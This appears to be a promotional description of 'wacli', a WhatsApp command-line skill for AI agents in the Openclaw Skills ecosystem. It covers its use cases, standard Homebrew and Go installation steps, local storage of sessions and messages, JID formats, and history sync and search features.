What is wacli?

The wacli skill is a powerful command-line interface integration that enables AI agents to interact with WhatsApp beyond standard user-to-agent chat routing. It is specifically built for scenarios where an agent needs to contact third parties, send files to groups, or programmatically search through chat archives. By utilizing this skill within the Openclaw Skills ecosystem, developers can bridge the gap between automated workflows and the WhatsApp communication network.

This tool provides a secure and structured way to manage WhatsApp data locally. It allows for authenticated sessions that can sync history, backfill old messages, and provide machine-readable JSON outputs, making it an essential component for agents that require deep integration with messaging history or outbound notification capabilities.

wacli Use Cases

  • Sending automated notifications or project updates to specific WhatsApp contacts or groups.
  • Retrieving historical data, such as past invoices or specific dates, from encrypted WhatsApp logs.
  • Archiving and syncing WhatsApp conversations for local data analysis or record-keeping.
  • Programmatic file sharing, such as sending generated reports or PDFs, directly to a recipient's WhatsApp.

How wacli Works

  1. The skill interfaces with the OpenClawProvider to establish a secure link with the WhatsApp service.
  2. Users authenticate their account using a QR code via the auth command, which initializes the local data store.
  3. When a specific action is triggered within Openclaw Skills, the agent identifies the target recipient using JIDs (Jabber IDs) for individuals or groups.
  4. Commands are executed to either dispatch a message or query the local database of synced messages.
  5. The tool returns results in a structured format, allowing the agent to confirm successful delivery or present search results to the user.

wacli Setup

To use this skill, you must first have the OpenClawProvider installed and running on your system. Once the provider is active, install the wacli binary:

# For macOS users using Homebrew
brew tap steipete/tap
brew install wacli

# For users with Go installed
go install github.com/steipete/wacli/cmd/wacli@latest

After installation, run wacli auth to link your WhatsApp account. Ensure you follow the specific OpenClawProvider setup instructions for your operating system (MacOS or Windows) to enable the underlying communication layer required for Openclaw Skills.

wacli Data Schema & Taxonomy

The skill manages data through a local storage system and uses specific identifiers for routing.

Component Details
Storage Directory ~/.wacli (Stores session tokens and synced message databases)
Individual JID <phonenumber>@s.whatsapp.net
Group JID <id>@g.us
Output Format Supports --json for structured, machine-readable data processing
Sync Metadata Includes message timestamps, sender IDs, and delivery status

wacli Advanced Features

  • Continuous background synchronization using the --follow flag to keep local message history updated.
  • Selective history backfilling to recover old conversations by specifying the number of requests and message counts.
  • Advanced search filters allowing users to find messages within specific date ranges (before/after).
  • Support for multi-media dispatch, enabling the sending of files with custom captions to both individuals and groups.
  • Robust diagnostic tools via the doctor command to ensure the CLI and provider connection are healthy within the Openclaw Skills environment.
